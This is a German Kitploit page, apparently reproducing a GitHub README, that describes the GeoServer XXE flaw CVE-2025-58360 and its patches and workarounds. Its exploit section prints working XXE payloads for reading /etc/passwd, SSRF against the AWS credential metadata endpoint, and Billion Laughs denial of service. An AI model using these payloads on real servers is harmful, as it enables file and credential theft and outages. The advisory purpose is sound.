Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Tools/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Repository anzeigen
7vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔓 🛰️ „CVE-2025-58360“ – GeoServer-WMS-Endpunkt anfällig für XXE-Angriff 🌟

GeoServer

🏷️ Basisinformationen

  • CVE-ID: CVE-2025-58360
  • Veröffentlicht: 📅 25. November 2025
  • Zuletzt geändert: 📅 25. November 2025 (Stand 26. Nov. noch brandaktuell)
  • Schwachstellentyp: XML External Entity (XXE) – CWE-611
  • Betroffene Software: GeoServer (Open-Source-Geodatenserver, in Java geschrieben)
  • Schweregrad: 🔥 Hoch – CVSS v3.1 Base Score 7.5
    • Vektor: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Ausnutzung in freier Wildbahn: 🟡 Noch nicht beobachtet (26. Nov. 2025) – aber öffentliche PoCs kursieren
  • Authentifizierung erforderlich: ❌ Keine – vollständig ohne Authentifizierung
  • Benutzerinteraktion erforderlich: ❌ Keine

🎨 Was diesen Bug besonders (und gefährlich) macht

Dies ist eine klassische, aber verheerende XXE im GetMap-Endpunkt des Web Map Service (WMS).
Angreifer können:

  • 📂 Beliebige Dateien lesen, auf die der GeoServer-Prozess Zugriff hat (/etc/passwd, geoserver.xml, private Schlüssel usw.)
  • 🌐 Server-Side Request Forgery (SSRF) durchführen, um interne Netzwerke zu scannen oder Metadaten-Endpunkte abzufragen (z. B. AWS/GCP)
  • 💣 Denial-of-Service mit Entity-Expansion-Angriffen („Billion Laughs“) auslösen
  • 🔗 Potenziell mit anderen Schwachstellen zu vollständigem RCE verketten (nicht direkt, aber in falsch konfigurierten Umgebungen möglich)

🛡️ Betroffene Versionen (detaillierte Tabelle)

KomponenteVerwundbare VersionenBehoben inStatus
GeoServer Standalone2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 Verwundbar
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 Verwundbar
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Verwundbar
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Verwundbar
GeoServer 2.27.x und neuer–Bereits gepatcht✅ Sicher

🌍 Globale Exposition (Echtzeit, Stand 26. Nov. 2025)

QuelleExponierte InstanzenAnmerkungen
ZoomEye~49.400app:"GeoServer"-Suche
FOFA~24.000Ergebnisse des letzten Jahres
Shodan~31.000Port 8080 + Titelübereinstimmung
GobySec~20.000Öffentlicher Netzwerkscan

→ Das sind zehntausende potenziell verwundbarer Server, die gerade jetzt im offenen Internet erreichbar sind! 🌐

🧨 Vollständiger technischer Exploit-Walkthrough

Endpunkt: POST /geoserver/wms
Schlüsselparameter: SLD_BODY (erlaubt rohes XML-Styling)
Verwundbarer Codepfad: Der XML-Parser deaktiviert die Auflösung externer Entities nicht → klassische XXE.

f77f64d7c92fd31b29d537f5205da524

Beispiel 1 – Datei-Offenlegung (/etc/passwd)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ Die Antwort enthält den Inhalt von /etc/passwd 🎉

Beispiel 2 – SSRF zu internen Metadaten (AWS-Beispiel)

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ Gibt temporäre AWS-Anmeldeinformationen preis, wenn GeoServer auf EC2 läuft.

Beispiel 3 – Billion-Laughs-DoS

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>

→ Verbraucht in Sekunden Gigabytes an RAM 💥

🛠️ Offizielle Patches & Downloads

VersionVeröffentlichungsdatumDownload-Link
2.27.025. Nov. 2025https://geoserver.org/release/stable/
2.26.325. Nov. 2025Patch für den Wartungszweig
2.25.625. Nov. 2025Älterer unterstützter Zweig

Docker-Nutzer:

docker pull osgeo/geoserver:2.27.0

🔧 Workarounds (falls Sie nicht sofort patchen können)

  1. Gefährliches XML blockieren mit WAF/mod_security-Regel:
    Anfragen ablehnen, die <!ENTITY oder SYSTEM "file:// enthalten
  2. SLD_BODY-Parameter global deaktivieren (falls nicht benötigt)
  3. GeoServer mit schreibgeschütztem Dateisystem ausführen + Capabilities entfernen
  4. Hinter einen Reverse-Proxy stellen, der XML-Bodies für nicht authentifizierte Benutzer entfernt

📢 Offizielle Referenzen & PoCs

  • NVD-Eintrag: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • GeoServer-Advisory: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • JIRA-Ticket: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • Öffentlicher sicherer PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Nuclei-Template (Auto-Erkennung): Bereits in den Hauptzweig gemerged

⏰ Zeitleiste

DatumEreignis
Vor Nov. 2025Autonom vom XBOW-AI-Scanner entdeckt
25. Nov. 2025Koordinierte Offenlegung → Patches veröffentlicht
25. Nov. 2025CVE zugewiesen und veröffentlicht
26. Nov. 2025PoCs werden viral, Expositions-Scans schnellen in die Höhe

✨ Schlussworte

Dies ist eine lehrbuchmäßige XXE, die eine weit verbreitete Geodatenplattform mit zehntausenden über das Internet erreichbaren Instanzen trifft.
Die Patches erschienen am selben Tag wie die Offenlegung – riesiges Lob an das GeoServer-Team für das Tempo! 🏆
Aber das Zeitfenster zwischen Patch-Verfügbarkeit und massenhafter Ausnutzung schrumpft rasant.

Wenn Sie GeoServer betreiben → aktualisieren Sie noch heute.
Werden Sie nicht die nächste Schlagzeile.

Bleiben Sie sicher, bleiben Sie glänzend! 🛡️✨

Tool herunterladen